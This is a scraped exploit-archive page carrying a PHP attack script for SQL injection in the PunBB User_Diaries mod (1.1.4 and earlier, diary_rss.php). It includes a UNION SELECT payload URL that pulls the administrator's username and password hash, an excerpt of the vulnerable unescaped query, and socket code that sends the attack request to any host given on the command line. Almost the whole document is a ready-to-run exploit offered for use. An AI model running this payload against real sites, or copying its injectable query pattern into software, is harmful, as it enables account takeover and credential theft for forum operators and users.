PunBB Mod User_Diaries <= 1.1.4 (diary_rss.php) Sql Injection Exploit
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PunBB Mod User_Diaries <= 1.1.4 (diary_rss.php) Sql Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================================
PunBB Mod User_Diaries <= 1.1.4 (diary_rss.php) Sql Injection Exploit
=====================================================================
#!/usr/bin/php
<?PHP
error_reporting(E_STRICT ^ E_WARNING);
/*
———————————————————————
PunBB Mod User_Diaries <= 1.1.4 "diary_rss.php" sql injection exploit
———————————————————————
download: http://www.punres.org/files.php?pid=467
by staker[at]hotmail[dot]it
———————————————————————
[*] http://[example]/diary_rss.php?id=0+UNION+SELECT+1,CONCAT_WS(0×3a,username,password),3,4,5,6,7,8,9+FROM+foo_users+WHERE+id=2#
[EXPLANATION / NOTE: IT WORKS REGARDLESS OF PHP.INI SETTINGS]
————————————————————-
{1} $user_id become $_GET['id'] variable.
{2} $user_id become $where variable.
{3} mysql query -> users AS r ON u.poster_id=r.id".$where." there’s no escape & quotes.
————————————————————-
[file: diary_rss.php | line: 69-83]
if (!empty($_GET["id"]))
{
$user_id = $_GET["id"]; <—- {1}
$where = " WHERE u.poster_id = ".$user_id; <—- {2}
}
else
{
$user_id = ”;
$where = ”;
}
$result = $db->query("
SELECT u.id, r.username, u.poster, u.poster_id, u.poster_ip, u.message, u.posted, u.entry_date,
u.image_ext FROM ".$db->prefix."diary as u LEFT JOIN ".$db->prefix."users AS
r ON u.poster_id=r.id".$where." ORDER BY u.posted DESC LIMIT 0,20 <——- {3}
") or error(‘Unable to fetch diary entries’, __FILE__, __LINE__, $db->error());
*********************************************************************************/
echo(‘
———————————————————————
PunBB Mod User_Diaries <= 1.1.4 "diary_rss.php" sql injection exploit
———————————————————————-
by staker[at]hotmail[dot]it
‘);
$host = $argv[1];
$path = $argv[2];
$pre = "punbb_"; // default table_prefix.
$uid = 2; // default id (admin)
$sql = ‘0+UNION+SELECT+1,CONCAT_WS(0×3a,username,password),3,4,5,6,7′.
",8,9+FROM+{$pre}users+WHERE+id={$uid}%23";
if ($argc != 3) {
die ("Usage: php diary.php localhost /punbb/n");
}
$packet = "GET {$path}/diary_rss.php?id={$sql} HTTP/1.1rn".
"Host: {$host}rn".
"User-Agent: Lynx (textmode)rn".
"Connection: closernrn";
if (preg_match(‘/<title>(.+?)</title>/’,data_send($target,$packet),$content)) {
$array = explode("’",$content[0]);
print "Result: $array[1]n";
}
else {
echo "Exploit failedn";
}
function data_send ($host,$data) {
if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!n");
} fputs($sock,$data);
while (!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}
?>
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-30]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13519
Leave a Reply